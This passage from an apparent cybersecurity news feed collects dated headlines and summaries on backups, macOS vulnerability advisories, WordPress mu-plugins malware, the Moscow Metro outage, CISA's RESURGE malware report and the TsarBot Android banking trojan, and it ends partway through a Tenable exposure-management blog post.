Ransomware Attacks: Ransomware encrypts files and demands a ransom for decryption. Even if organizations pay, there's no guarantee of file recovery. A strong backup strategy ensures quick restoration without paying cybercriminals.
Technical Failures: Hardware crashes, software corruption, and system failures can render data inaccessible. Cloud backups provide real-time recovery, reducing downtime and ensuring business continuity.
Human Error: Employees may accidentally delete, overwrite, or misplace critical files. A versioned backup system allows restoration to previous states, mitigating accidental losses.
Physical Disasters: Fires, floods, and power surges can wipe out local storage. Offsite and cloud backups provide a safety net against such disasters.
Organizations must implement strong backup solutions to counteract these threats effectively.
Social Engineering Attacks Targeting Backups
Cybercriminals exploit human psychology to infiltrate backup systems. Some common tactics include:
Phishing Attacks: Attackers trick employees into clicking malicious links or downloading malware that compromises backups.
Impersonation and Pretexting: Hackers pose as IT personnel, convincing employees to grant unauthorized access to backup systems.
Insider Threats: Disgruntled employees with access to backups can delete, alter, or leak sensitive data.
To prevent these threats, businesses must implement multi-factor authentication, access controls, and security awareness training.
How to Implement a Backup Strategy for Workplace Cybersecurity
A structured backup strategy ensures data integrity and swift recovery. Here’s a recommended approach:
1. Follow the 3-2-1 Backup Rule: Maintain 3 copies of data: 1 primary and 2 backups. Store backups on 2 different media types (e.g., cloud and external drive). Keep 1 backup offsite for disaster recovery.
2. Automate Backups: Schedule daily or real-time backups to prevent accidental data loss. Ensure versioning so previous file versions remain accessible.
3. Encrypt Backup Data: Use end-to-end encryption to prevent unauthorized access. Restrict access to authorized personnel only.
4. Regularly Test Backups: Conduct routine recovery drills to verify data integrity. Ensure that restoration procedures work as intended.
Training Employees to Follow Best Backup Practices
Educating employees on proper backup protocols is key to reducing human errors. Consider implementing:
1. Employee Cybersecurity Awareness Programs: Teach employees about phishing risks and social engineering threats. Demonstrate how to recognize suspicious backup activity.
2. Regular Backup Training Sessions: Train employees on how and when to back up data. Provide guides on secure backup handling.
3. Access Control Measures: Limit backup access to authorized personnel only. Implement role-based permissions to prevent accidental deletions.
4. Incident Response Drills: Simulate backup recovery scenarios to ensure employees are prepared. Test their ability to restore files in real time.
By incorporating these practices, organizations can minimize human errors and strengthen their backup resilience.
To Sum Up
As the survey reveals, human error remains one of the biggest threats to backup integrity. Accidental deletions, overwritten files, ignored security protocols, and misplaced backup devices can wipe out important data in an instant. The reality is that even the best technology cannot compensate for poor user practices. Organizations must stop viewing backups as a one-time solution and start treating them as an ongoing responsibility. Automating backup processes, enforcing security policies, and educating employees about their role in data protection are not optional—they are essential. Without a well-executed backup strategy, businesses risk more than just data loss; they risk their reputation, financial stability, and long-term survival. As Amit Luthra emphasizes, the modern backup strategy must “transcend mere recovery; it embodies proactive resilience.” That means integrating immutable backups, cyber resilience, and AI-driven automation into backup protocols. With ransomware and cyber threats evolving rapidly, the question isn't just whether you have a backup—it’s whether your backup strategy is resilient enough to tolerate human errors. The time to act is now. Because when disaster happens, the only thing worse than losing your data is realizing it was preventable.
Image Reference: All images inserted in this article are self-designed by the author with the help of Canva.
by The Cyber Express
2025-04-01 07:45:44
Hiding WordPress malware in the mu-plugins directory to avoid detection
Sucuri researchers spotted threat actors deploying WordPress malware in the mu-plugins directory to evade security checks. In February, Sucuri warned of threat actors exploiting WordPress mu-plugins, which auto-load without activation, to maintain persistence and evade detection by hiding backdoors in the plugin directory. “Unlike regular plugins, must-use plugins are automatically loaded on every page load, […]
by Security Affairs
2025-04-01 07:22:38
Moscow Metro Digital Outage: Alleged Cyberattack or Technical Failure?
The Moscow Metro website and mobile application experienced disruptions on March 31, 2023. Users of the Moscow subway app reported various malfunctions, including problems loading personal accounts and difficulty accessing key features such as ticket purchasing and account management. The metro website, an essential tool for navigating the city’s vast metro system, became unavailable on the same day, displaying a peculiar message that hinted at an alleged cyberattack. The message, a technical failure banner, mimicked a similar notification that had appeared on the Ukrainian Railways website a few days prior.

Ukrainian Railways, known locally as Ukrzaliznytsia, had fallen victim to a large-scale cyberattack on March 23, 2023. As a result, its website and mobile application were rendered inoperable, preventing travelers from purchasing tickets online. The state-owned railway company attributed the attack to "the enemy" but did not provide further details on the perpetrators.

The Moscow Metro and Ukrainian Railways Incident
The disruption of the Moscow Metro’s digital services comes amid a broader wave of cyberattacks targeting transportation infrastructure in the region. On March 31, Russian users flocked to the outage-reporting service Downdetector.su to report issues with both the app and its website, mosmetro.ru. Affected users complained about an inability to access personal accounts, problems with payment sections, and complete failures of app functionality. According to The Kyiv Independent, the outage-reporting service recorded up to 40,000 user reports on that day alone. Interestingly, the website displayed a banner featuring a message in Ukrainian, along with a reference to Ukrainian Railways. This sparked widespread speculation that the Moscow Metro’s website had been compromised in a manner similar to the earlier attack on Ukrzaliznytsia. While Russian authorities have not confirmed this, experts suspect that hackers could be behind the disruption, particularly since the Ukrainian Railways site had suffered a similar breach just days earlier.

Moscow Metro’s Response to the Outage
[Image: Statement from Dept. of Transport. Operational (Source: Telegram)]
The Moscow transport department quickly issued a statement via its official Telegram channel, acknowledging the technical difficulties and reassuring passengers that steps were being taken to resolve the issues. According to the department, the outages were due to "technical maintenance," and users were advised to expect temporary problems when accessing personal accounts in the app. Despite the app’s malfunctions, passengers could still top up their “Troika” transport cards at physical ticket offices and terminals throughout metro stations. Roskomnadzor, Russia’s federal service for surveillance of communications, also acknowledged the increase in reports about Moscow Metro’s technical issues. However, the agency refrained from commenting on the specific causes of the disruptions, which continue to be a source of concern for commuters. The Moscow Metro’s website was temporarily down for most of the day, and the disruption raised more questions than answers. For instance, one of the key complaints from Russian users was the difficulty of paying for tickets via the metro’s payment system, as the payment section did not load properly in the app. Many users also noted that the app would not load at all, leaving them unable to access their accounts or purchase tickets.

Conclusion
The recent cyberattack on Ukrainian Railways (Ukrzaliznytsia) and the subsequent disruptions to the Moscow Metro app and website highlight the growing vulnerability of critical infrastructure to digital threats. While Ukrzaliznytsia has partially restored its online ticketing services after an intense recovery effort, the incident underscored the challenges of securing essential systems against such attacks. The near-simultaneous issues faced by the metro suggest a potential connection, raising concerns about the broader implications for cybersecurity in politically sensitive regions.
by The Cyber Express
2025-04-01 06:39:22
AUTOMATED SCRIPT FOR FINDING XSSAn example of a web security vulnerability is cross-site scripting (XSS), which enables attackers to insert malicious executable scripts…
by InfoSec Write-ups
2025-04-01 06:38:11
How to Plan a CTI Project: Key Documentation You NeedLearn how to plan a CTI project using key documentation in this comprehensive guide. Avoid roadblocks and set your project up for success!
by InfoSec Write-ups
2025-04-01 06:00:00
SonicWall-CVE-2024-53704: Exploit DetailsBishop Fox researcher, Jon Williams, explains how they successfully exploited CVE-2024-53704, an authentication bypass in unpatched SonicWall firewalls.
by Bishop Fox
2025-04-01 06:00:00
Tomcat CVE-2025-24813: What You Need to KnowA breakdown of CVE-2025-24813 in Apache Tomcat—what it is, who’s actually at risk, and why most users likely aren’t affected. Keep calm and patch your servers.
by Bishop Fox
2025-04-01 04:00:00
Get Off My Lawn and Fix Your Vulnerabilities!Tired of boring scans? Meet Greybeard, Snyk's humorous AI security CLI that gives unforgettable, brutally honest vulnerability feedback developers won't forget. Greybeard is an April Fool's tool that really works.
by Snyk
2025-04-01 04:00:00
Q&A Session with Snyk & John Hammond: Your Fetch the Flag Questions, AnsweredHere are five standout questions and answers from Snyk’s Fetch the Flag CTF event on February 27 and 28. Sit down with cybersecurity educator and developer influencer John Hammond—along with challenge designer Matt Kiely (aka huskyhacks), and developer advocates Micah Silverman, Sonya Moisset, Vandana Verma, and Elliot Ward—for a live Q&A session.
by Snyk
2025-04-01 00:00:00
Outlaw Linux Malware: Persistent, Unsophisticated, and Surprisingly EffectiveOutlaw is a persistent Linux malware leveraging simple brute-force and mining tactics to maintain a long-lasting botnet.
by Elastic Security Lab
2025-04-01 00:00:00
CUI For the Rest of Us: The New Government-Wide CUI Protection Contract ClauseU.S. government contractors need to start preparing for a proposed new government-wide Controlled Unclassified Information (CUI) protection requirement.
by TrustedSec
2025-04-01 00:00:00
ZDI-25-196: Apple macOS ICC Profile Parsing Out-Of-Bounds Write Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-24185.
by Zero Day Initiative Advisories
2025-04-01 00:00:00
ZDI-25-195: Apple macOS CoreGraphics Image Parsing Out-Of-Bounds Read Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-24210.
by Zero Day Initiative Advisories
2025-04-01 00:00:00
ZDI-25-194: Apple macOS AppleIntelKBLGraphics Time-Of-Check Time-Of-Use Information Disclosure VulnerabilityThis vulnerability allows local attackers to disclose sensitive information on affected installations of Apple macOS. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The ZDI has assigned a CVSS rating of 6.4. The following CVEs are assigned: CVE-2025-24256.
by Zero Day Initiative Advisories
2025-04-01 00:00:00
ZDI-25-193: Apple macOS CoreText Font Glyphs Parsing Out-Of-Bounds Read Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-24182.
by Zero Day Initiative Advisories
2025-04-01 00:00:00
ZDI-25-192: Apple macOS MP4 File Parsing Memory Corruption Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-24190.
by Zero Day Initiative Advisories
2025-04-01 00:00:00
ZDI-25-191: Apple macOS MP4 File Parsing Out-Of-Bounds Write Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 8.8. The following CVEs are assigned: CVE-2025-24211.
by Zero Day Initiative Advisories
2025-04-01 00:00:00
ZDI-25-190: Apple macOS MP4 File Parsing Out-Of-Bounds Read Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 4.3. The following CVEs are assigned: CVE-2025-24230.
by Zero Day Initiative Advisories
2025-04-01 00:00:00
ZDI-25-189: Apple macOS AudioToolbox AMR File Parsing Memory Corruption Remote Code Execution VulnerabilityThis vulnerability allows remote attackers to execute arbitrary code on affected installations of Apple macOS. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The ZDI has assigned a CVSS rating of 7.8. The following CVEs are assigned: CVE-2025-24243.
by Zero Day Initiative Advisories
2025-04-01 00:00:00
ZDI-25-188: Apple macOS AudioToolboxCore WAV File Parsing Out-Of-Bounds Read Information Disclosure VulnerabilityThis vulnerability allows remote attackers to disclose sensitive information on affected installations of Apple macOS. Interaction with the AudioToolboxCore library is required to exploit this vulnerability but attack vectors may vary depending on the implementation. The ZDI has assigned a CVSS rating of 3.3. The following CVEs are assigned: CVE-2025-24244.
by Zero Day Initiative Advisories
2025-03-31 22:11:00
Russian Hackers Exploit CVE-2025-26633 via MSC EvilTwin to Deploy SilentPrism and DarkWispThe threat actors behind the zero-day exploitation of a recently-patched security vulnerability in Microsoft Windows have been found to deliver two new backdoors called SilentPrism and DarkWisp. The activity has been attributed to a suspected Russian hacking group called Water Gamayun, which is also known as EncryptHub and LARVA-208. "The threat actor deploys payloads primarily by means of
by The Hacker News
2025-03-31 21:29:43
Oracle Cloud Users Urged to Take ActionAlthough Oracle has denied its cloud infrastructure services were breached, security experts recommend Oracle customers independently verify if they were affected and take measures to reduce exposure to potential fallout.
by Dark Reading
2025-03-31 20:55:57
CoffeeLoader Malware Is Stacked With Vicious Evasion TricksNext-level malware represents a new era of malicious code developed specifically to get around modern security software like digital forensics tools and EDR, new research warns.
by Dark Reading
2025-03-31 20:00:00
New MSP opportunity: Tapping into the growing field of transportation cybersecurityThe transportation vertical is rapidly growing, yet it is often overlooked by MSPs. See why MSPs should pay attention to transportation cybersecurity in this post.
by Barracuda
2025-03-31 19:56:01
U.S. CISA adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalogU.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Cisco Smart Licensing Utility flaw to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added a Cisco Smart Licensing Utility vulnerability, tracked as CVE-2024-20439, to its Known Exploited Vulnerabilities (KEV) catalog. Last week, Cisco disclosed two vulnerabilities in its Smart Licensing Utility: CVE-2024-20439, […]
by Security Affairs
2025-03-31 19:42:00
Cybersecurity Professor Mysteriously Disappears as FBI Raids His HomesXiaofeng Wang, a longtime computer science professor at Indiana University, has disappeared along with his wife, and their profiles on the school's website were wiped ahead of recent FBI raids.
by WIRED Security News
2025-03-31 19:28:13
CISA Details New Malware Used in Ivanti Attacks
The U.S. Cybersecurity and Information Security Agency (CISA) has issued an advisory detailing a new malware variant detected in attacks on an Ivanti vulnerability. The CISA advisory says the agency recovered three files from a critical infrastructure environment’s Ivanti Connect Secure device after threat actors exploited Ivanti vulnerability CVE-2025-0282 for initial access. One of the files contained a new malware variant that CISA is calling RESURGE, which is similar to SPAWNCHIMERA in that it creates a Secure Shell (SSH) tunnel for command and control activities. The new variant adds important new capabilities, however.

RESURGE Malware Adds New Capabilities
RESURGE malware goes well beyond SPAWNCHIMERA with its ability to modify files, manipulate integrity checks, and create a web shell that is copied to the running Ivanti boot disk. The RESURGE file, 'libdsupgrade.so,' is a malicious 32-bit Linux Shared Object file, CISA said. The file contains a rootkit, dropper, backdoor, bootkit, proxy, and tunneler. A second file ('liblogblock.so') is a variant of the SPAWNSLOTH log tampering utility that was contained within the RESURGE sample. The third file ('dsmain') is a custom embedded binary containing an open-source shell script and applets from the open-source tool BusyBox, CISA said. The shell script can extract an uncompressed kernel image (vmlinux) from a compromised kernel image, while BusyBox lets threat actors “perform various functions such as download and execute payloads on compromised devices,” the agency said. CISA included file hashes and YARA detection rules based on the SHA-256 hashes. For RESURGE, the SHA-256 hash is 52bbc44eb451cb5e16bf98bc5b1823d2f47a18d71f14543b460395a1c1b1aeda. The SPAWNSLOTH hash is 3526af9189533470bc0e90d54bafb0db7bda784be82a372ce112e361f7c7b104, and the dsmain hash is b1221000f43734436ec8022caaa34b133f4581ca3ae8eccd8d57ea62573f301d.

CISA Recommendations
CISA recommended a number of controls in the advisory, such as:
- Disabling file and printer sharing services if possible, or at least using strong passwords or Active Directory authentication.
- Restricting users' ability to install and run unwanted software applications.
- Exercising caution when opening e-mail attachments “even if the attachment is expected and the sender appears to be known.”
- Enabling a personal firewall on workstations and configuring it to deny unsolicited connection requests.
- Disabling unnecessary services on workstations and servers.
- Scanning for and removing suspicious e-mail attachments, and ensuring that the attachment extension matches the file header.
- Maintaining awareness of the latest threats and implementing appropriate Access Control Lists (ACLs).
by The Cyber Express
2025-03-31 19:12:26
Top 10 Most-Used RDP Passwords Are Not Complex EnoughNew research from Specops Software shows attackers successfully attack and gain access to RDP with the most basic passwords.
by Dark Reading
2025-03-31 19:10:20
DoJ Seizes Over $8M From Sprawling Pig Butchering SchemeThe department was able to trace the stolen funds to three main cryptocurrency accounts after being routed through a series of other platforms.
by Dark Reading
2025-03-31 19:01:00
Top 1,000 IT service providers in scope of UK cyber billThe government’s proposed Cyber Security and Resilience Bill is set to include regulatory provisions covering both datacentre operators and larger IT service providers
by ComputerWeekly
2025-03-31 18:19:08
Oracle under fire for its handling of separate security incidentsOracle has denied at least one breach, despite evidence to the contrary, as it begins notifying healthcare customers of a separate patient data breach.
by TechCrunch
2025-03-31 18:02:28
Connect to Exchange Online PowerShellThis post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Introduction to Exchange Online PowerShell Exchange Online PowerShell is a command-line management interface for administering and automating tasks in Exchange Online, which is a part of Microsoft 365. It allows administrators to manage user mailboxes, configure organizational settings, and perform bulk operations efficiently through scripting. Here are some benefits of using PowerShell for Exchange Online … Continued
by Netwrix
2025-03-31 17:57:03
CISA Warns of Resurge Malware Connected to Ivanti VulnThreat actors are exploiting a vulnerability in Ivanti Connect Secure first disclosed by the vendor in January.
by Dark Reading
2025-03-31 17:41:05
How IP cameras can help attackers | Kaspersky official blogRansomware attacks are exploiting vulnerabilities in smart devices. How do we protect ourselves?
by Kaspersky
2025-03-31 17:34:00
Hackers Exploit WordPress mu-Plugins to Inject Spam and Hijack Site ImagesThreat actors are using the "mu-plugins" directory in WordPress sites to conceal malicious code with the goal of maintaining persistent remote access and redirecting site visitors to bogus sites. mu-plugins, short for must-use plugins, refers to plugins in a special directory ("wp-content/mu-plugins") that are automatically executed by WordPress without the need to enable them explicitly via the
by The Hacker News
2025-03-31 17:25:57
🐝 Hive Five 217 - High Agency and the Beginner's MindFrom beginner's mind in tech and high agency living, to critical cloud vulnerabilities and the future of writing with AI, plus an epic ultramarathon victory.
by Hive Five
2025-03-31 17:01:00
API testing firm APIsec exposed customer data during security lapseThe API testing firm took down a database exposed to the internet without a password.
by TechCrunch
2025-03-31 16:55:00
⚡ Weekly Recap: Chrome 0-Day, IngressNightmare, Solar Bugs, DNS Tactics, and MoreEvery week, someone somewhere slips up—and threat actors slip in. A misconfigured setting, an overlooked vulnerability, or a too-convenient cloud tool becomes the perfect entry point. But what happens when the hunters become the hunted? Or when old malware resurfaces with new tricks? Step behind the curtain with us this week as we explore breaches born from routine oversights—and the unexpected
by The Hacker News
2025-03-31 16:48:23
Industry Moves for the week of March 31, 2025 - SecurityWeekExplore industry moves and significant changes in the industry for the week of March 31, 2025. Stay updated with the latest industry trends and shifts.
by SecurityWeek
2025-03-31 16:30:00
5 Impactful AWS Vulnerabilities You're Responsible ForIf you're using AWS, it's easy to assume your cloud security is handled - but that's a dangerous misconception. AWS secures its own infrastructure, but security within a cloud environment remains the customer’s responsibility. Think of AWS security like protecting a building: AWS provides strong walls and a solid roof, but it's up to the customer to handle the locks, install the alarm systems,
by The Hacker News
2025-03-31 15:40:30
Trend Micro Open Sources AI Tool CybertronThe cybersecurity artificial intelligence (AI) model and agent will help organizations improve threat detection and incident response.
by Dark Reading
2025-03-31 15:04:45
France Fines Apple €150M for Weaponizing Privacy Against CompetitorsFrance's competition authority has fined Apple €150 million ($162M) for leveraging its privacy framework, App Tracking Transparency (ATT), to distort competition. The case underscores how privacy, when implemented asymmetrically, can become a strategic tool that undermines both market fairness and user agency. The fine, issued by the Autorité de la Concurrence, concludes a multi-year investigation … The post France Fines Apple €150M for Weaponizing Privacy Against Competitors appeared first on CyberInsider.
by Cyber Insider
2025-03-31 15:00:00
Russia-Linked Gamaredon Uses Troop-Related Lures to Deploy Remcos RAT in UkraineEntities in Ukraine have been targeted as part of a phishing campaign designed to distribute a remote access trojan called Remcos RAT. "The file names use Russian words related to the movement of troops in Ukraine as a lure," Cisco Talos researcher Guilherme Venere said in a report published last week. "The PowerShell downloader contacts geo-fenced servers located in Russia and Germany to
by The Hacker News
2025-03-31 14:49:26
Windows 11 Installations to Require Internet Connection and Microsoft AccountIn the latest Windows 11 Insider Preview Build 26200.5516, Microsoft has removed the ability to install the operating system without both internet connectivity and a Microsoft account, effectively eliminating a long-standing workaround that allowed local account setups during installation. The change was first spotted by security researcher Will Dormann, who noted that Microsoft has removed … The post Windows 11 Installations to Require Internet Connection and Microsoft Account appeared first on CyberInsider.
by Cyber Insider
2025-03-31 14:41:40
How to Use Microsoft Copilot for Security: Complete eGuide to Generative AI for CybersecurityThis post first appeared on blog.netwrix.com and was written by Farrah Gamboa.An Introduction to Microsoft Copilot for Security In the constantly evolving world of cybersecurity, defense teams need all the resources they can get to keep up. Fortunately, the massive advances in generative AI present SOC teams with a powerful set of tools to optimize security practices and match even fully automated adversaries using natural language … Continued
by Netwrix
2025-03-31 14:10:36
Quantum Computing: Preparing for the Next Technological RevolutionQuantum computing promises breakthroughs across industries, from fraud detection to drug discovery, but businesses must prepare now to stay ahead of the curve.
by ITPro Today
2025-03-31 14:00:00
Bridging the Gap Between the CISO & the Board of DirectorsPositioning security leaders as more than risk managers turns them into business enablers, trusted advisers, and, eventually, integral members of the C-suite.
by Dark Reading
2025-03-31 13:57:33
Qakbot Resurfaces in Fresh Wave of ClickFix AttacksAttackers post links to fake websites on LinkedIn to ask people to complete malicious CAPTCHA challenges that install malware.
by Dark Reading
2025-03-31 13:56:46
New Android Banking Trojan Targets More Than 750 Financial and Crypto Apps
Cyble researchers have discovered a new Android banking trojan that uses overlay attacks and other techniques to target more than 750 applications, including banking, finance, cryptocurrency, payment, social media, and e-commerce applications. Dubbed “TsarBot” because of the threat actor’s suspected Russian origin, the malware uses overlay attacks to steal credentials and can also record and control the screen. Other attack techniques used by the malware include lock-grabbing, keylogging, and intercepting SMS messages. Abusing Accessibility services and WebSocket communications helps the malware maintain a low profile.

TsarBot Spread Through Phishing Sites
TsarBot was observed spreading through a phishing site that impersonates the official Photon Sol token discovery and trading site. “The phishing site deceptively offers a download option for an application to start trading, whereas the legitimate website lacks such an option,” Cyble noted in a blog post detailing the findings. Three phishing sites deploying TsarBot were identified by the researchers: solphoton[.]io, solphoton[.]app, and cashraven[.]online. The phishing sites deliver a dropper application that stores the TsarBot APK file, implant.apk, in the “res/raw” folder and uses a session-based package installer to deploy the TsarBot malware on the device. After deployment, TsarBot presents a fake Google Play Service update page that prompts the user to enable Accessibility services, after which it establishes a socket connection with the command and control (C&C) server using ports 9001, 9002, 9004 and 9030. “By abusing Accessibility services and WebSocket communication, it enables on-device fraud while maintaining a low profile,” the Cyble researchers wrote.

TsarBot Actions Include Fraud, Password Theft
Cyble identified about 30 commands that TsarBot can receive from the server, primarily focused on on-screen control to carry out on-device fraud. The “REQUEST_CAPTURE” command, for example, prompts the user to enable screen capture permissions. “Once granted, the malware initiates the screen capture service, transmitting the captured screen content to the C&C server via a WebSocket connection on port 9002,” the researchers wrote. “By capturing screen content and executing server-issued screen control commands, TsarBot can carry out fraudulent transactions on the targeted device by concealing this fraud activity with a black overlay screen.” TsarBot’s LockTypeDetector feature determines the device’s lock type using the Accessibility service. “Once identified, it saves the lock type status for future use in lock-grabbing operations,” Cyble said. When TsarBot receives the “USER_PRESENT” action for the first time, it loads a fake lock screen based on the lock type and captures the user’s lock password, PIN, or pattern.

Mimicking Applications
TsarBot retrieves a list of targeted application package names, most of which belong to regional banking apps from countries such as France, Poland, the UK, India, the UAE, and Australia. Other package names are associated with e-commerce, social media, messaging, cryptocurrency, and other apps. TsarBot collects the installed applications on the device and compares them against the package names, “maintaining a target list for overlay attacks,” Cyble said. “The injection page mimics a legitimate application, tricking users into entering sensitive information such as net banking credentials, login details, and credit card information,” Cyble said. “After transmitting the stolen sensitive information, TsarBot removes the targeted application’s package name from the list to prevent the overlay from being triggered again for the same app.”

Cyble said the malware drives home the importance of best practices such as only downloading software from official application stores, such as the Google Play Store or the iOS App Store; using strong passwords, multi-factor authentication and biometric security; enabling Google Play Protect; and exercising caution when opening links sent via SMS or email. The full Cyble blog includes additional details, such as indicators of compromise (IoCs) and MITRE ATT&CK techniques.
by The Cyber Express
2025-03-31 13:52:32
Russia-linked Gamaredon targets Ukraine with Remcos RATRussia-linked Gamaredon targets Ukraine with a phishing campaign using troop-related lures to deploy the Remcos RAT via PowerShell downloader. Talos researchers warn that Russia-linked APT group Gamaredon (a.k.a. Armageddon, Primitive Bear, ACTINIUM, Callisto) targets Ukraine with a phishing campaign. The cyberespionage group is behind a long series of spear-phishing attacks targeting Ukrainian entities, and organizations related […]
by Security Affairs
2025-03-31 13:00:00
A Not So Comprehensive Guide to Securing Your Salesforce OrganizationExplore key background knowledge on authorization issues and common bad practices developers may unintentionally introduce in Salesforce Orgs. The post A Not So Comprehensive Guide to Securing Your Salesforce Organization appeared first on NetSPI.
by NetSPI
2025-03-31 12:28:58
Atlantis AIO: The big ‘all-in-one’ credential stuffing platformAtlantis AIO is a cybercrime-as-a-service platform that accelerates credential stuffing and account takeover attacks. This blog explores the platform and the dangers of its advanced capabilities.
by Barracuda
2025-03-31 12:27:00
Hacker linked to Oracle Cloud intrusion threatens to sell stolen dataSecurity researchers from Trustwave SpiderLabs provided additional evidence backing up claims of a breach.
by Cybersecurity Dive
2025-03-31 12:00:00
Enterprises beef up cybersecurity plans to mitigate AI risksMore than 2 in 5 leaders say they’ve strengthened practices to curb increased threats, misuse and other vulnerabilities tied to using the technology.
by Cybersecurity Dive
2025-03-31 11:00:13
Beers with Talos: Year in Review episodeIn this podcast, Joe, Hazel, Bill and Dave break down Talos' Year in Review 2024 and discuss how and why cybercriminals have been leaning so heavily on attacks that are rooted in stealth and simplicity.
by Cisco Talos Blog
2025-03-31 10:31:25
CISA warns new malware targeting Ivanti zero-day vulnerabilityCVE-2025-0282, a critical vulnerability that affects Ivanti’s Connect Secure, Policy Secure and ZTA Gateway products, was disclosed and patched in January.
by Cybersecurity Dive
2025-03-31 10:25:08
Oracle Reportedly Warns Health Customers of Patient Data BreachThe cloud company told customers that hackers had potentially accessed older Cerner servers, Bloomberg reports.
by ITPro Today
2025-03-31 10:11:48
Navigating the Cybersecurity Highway: Mastery Through Centralised Command and ControlIn the fast-paced world of IT security, managing a complex infrastructure without a centralised command system is akin to navigating a densely packed highway in a high-performance sports car without a dashboard, steering, or brakes. Each component in a car – from the precision of […] The post Navigating the Cybersecurity Highway: Mastery Through Centralised Command and Control first appeared on BlockAPT.
by BlockAPT
2025-03-31 10:00:00
An AI Image Generator’s Exposed Database Reveals What People Really Used It ForAn unsecured database used by a generative AI app revealed prompts and tens of thousands of explicit images—some of which are likely illegal. The company deleted its websites after WIRED reached out.
by WIRED Security News
2025-03-31 09:53:35
Available now: 2024 Year in ReviewDownload Talos' 2024 Year in Review now, and access key insights on the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks.
by Cisco Talos Blog
2025-03-31 09:48:35
46 Flaws in Solar Inverters Could Let Attackers Disrupt Entire Power GridsForescout’s Vedere Labs has identified 46 vulnerabilities in solar inverters—devices that convert energy from solar panels into usable electricity for the grid. These inverters, manufactured by Sungrow, Growatt, and SMA, are widely deployed in residential, industrial, and utility-scale installations. The flaws include remote code execution, insecure APIs, hardcoded credentials, IDOR (insecure direct object reference), and […] The post 46 Flaws in Solar Inverters Could Let Attackers Disrupt Entire Power Grids appeared first on ZENDATA Cybersecurity.
by Zendata
2025-03-31 09:27:03
Post-Exploitation Activities on PAN-OS Devices: A Network-Based AnalysisThis blog investigates the network-based activity detected by Darktrace in compromises stemming from the exploitation of a vulnerability in Palo Alto Networks firewall devices, namely CVE-2024-3400.
by Darktrace
2025-03-31 09:00:00
What is a hacker?A hacker is an individual who uses computer, networking or other skills to overcome a technical problem.
by ComputerWeekly
2025-03-31 09:00:00
Cybersecurity Leaders Share Three Challenges Exposure Management Helps Them Solve
Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. In this blog, we share three challenges cybersecurity leaders say exposure management helps them solve. You can read the entire Exposure Management Academy series here.

Traditional vulnerability management is undergoing a transformation. The core cybersecurity discipline is evolving into exposure management, which is built on a broader, more strategic approach to identifying, prioritizing and mitigating risk. Modern IT environments have long since grown beyond the on-premises data center to include cloud infrastructure, mobile devices, internet-of-things (IoT) systems and operational technology (OT).

To get a close look at this shift, the Tenable Exposure Management Academy regularly interviews cybersecurity leaders around the world. Our goal is to gain insights into their real-world experiences making the shift from traditional vulnerability management to exposure management. We conduct these discussions on the condition of anonymity. This blog reveals the three key challenges they're solving with exposure management.

The three challenges exposure management addresses
The leaders we spoke with want to do more than just track vulnerabilities. They want to understand and reduce real-world cyber risk across their expanding attack surfaces. Exposure management helps them tackle three challenges:

1. Lack of attack surface visibility
For effective risk management, the leaders we spoke with are seeking a complete, unified view of all assets and their associated exposures across diverse environments. Visibility is essential because security teams can't protect what they can't see.

In our discussion, a security leader at a distributor noted that many organizations struggle with asset ownership and accountability in expansive environments. "Sometimes, if you have a vulnerability happening, you just need to know who owns it," the leader pointed out. "But no matter who owns it, we need to track it. We didn't have a lot of visibility on that and we needed to know in order to effectively manage vulnerabilities."

Exposure management provides visibility beyond traditional siloed IT assets, including:
- Cloud environments (public, private, multi-cloud and hybrid)
- Mobile and remote endpoints
- Containers and microservices
- OT and industrial control systems
- Third-party and supply-chain integrations

The key: With the right exposure management strategy, you can consolidate and normalize security data from multiple tools and environments, keep asset records (including ownership) accurate, reduce blind spots and improve response times.

2. Difficulty prioritizing remediation
Not all vulnerabilities pose the same level of risk. Determining how much risk a given vulnerability presents requires context specific to your environment: who or what has access to the asset, what privileges they hold and how critical the asset is to business functions. Traditional vulnerability management can't connect these dots for effective risk prioritization.

When security teams are overwhelmed by thousands of potential issues, they can't effectively guide the IT counterparts tasked with remediation. Exposure management provides the additional context needed to practice risk-based vulnerability management, focusing remediation on the vulnerabilities with the greatest potential impact in your environment.

Exposure management helps you understand whether attackers are actively using a vulnerability in attacks (we call this "exploitability"), how important the affected system is to your organization (we call this "asset criticality rating") and how an attacker could exploit a vulnerability in real-world scenarios (also known as "potential attack pathways").

